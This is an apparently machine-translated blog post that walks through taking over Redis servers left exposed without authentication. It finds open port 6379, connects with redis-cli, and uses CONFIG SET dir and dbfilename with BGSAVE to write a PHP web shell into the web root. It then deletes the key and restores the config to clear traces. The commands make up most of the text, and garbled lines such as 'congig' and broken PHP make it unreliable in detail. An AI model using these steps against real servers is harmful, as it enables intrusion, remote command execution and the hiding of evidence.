0x00 PrefaceRedis is now a lot of direct-to-open ports that can be accessed directly from the extranet without any authentication. The relevant examples can be found on Shodan or Zoomeye. So the problem is, as an in-memory database, there must be a lot of sensitive information on Redis, such as Redis for session storage, which can lead to the disclosure of sensitive information. However, recent research on Redis from the cloud community and drops see someone getshell, thinking more interesting, specifically to write a summary.
0x01 Redis Port detection6379 when judging, use a Python client to scan, or access 6379 directly on the browser to view banner information:
0x02 Install a CLI locallyRun REDIS-CLI-H [hostname]-p [port] For example 10.10.10.1 6379 is open, then connect: redis-cli-h 10.10.10.1 into the interactive shell of Redis.
0x03 using Redis to write to the shellConditions: (1) There is a Web server (2) on the Redis server the Web root known principle: One way to backup data in Redis is to back up to an. rdb file in the Dbfilename in the configuration fileThis backup method is saved based on the frequency of the time. However, there is a config set command in Redis that modifies the configuration options for the Redis runtime. Where redis.conf has a dir option to choose to save the Dump.rdb directory, the default is the current directory:We can control the Dir and Dbfilename options and write the shell to the Web site's root directory (assuming/var/www/html):
CONFIG set dir/var/www/html # Modify backup directory congig SET dbfilename shell.php # Modify backup file name to our shell name
Creates a string that can be written to the backup file when it is backed up.
SET Shell "<?php system ($_get[' cmd"); > "
To back up the data to disk:
BGSAVE
0x04 Clear Traces(1) Delete key (2) It is best to use config get to see what the original value is before using Dir and Dbfilename.
DEL Payloadconfig Set dir/usr/local/rediscongig set Dbfilename Dump.rdb
0x05 TestTo access the shell:
0x06 Problem(1) One is someone on drops said the backup data file default permissions are 0600, but running Redis locally using root does not have this permission problem and can be successfully written. (2) In general, the use of backup data in Redis, the previous data will be fully backed up once, that is, the database persistence file is likely to be very large, Apache read or not read out or a matter, too big may directly block down. One way is to back up all the data, then Flushall, then back up the export shell, and then use the first step of the persistence file for recovery, which may result in some data loss, damage to the site, or not recommended.
A summary of Getshell problems in Redis infiltration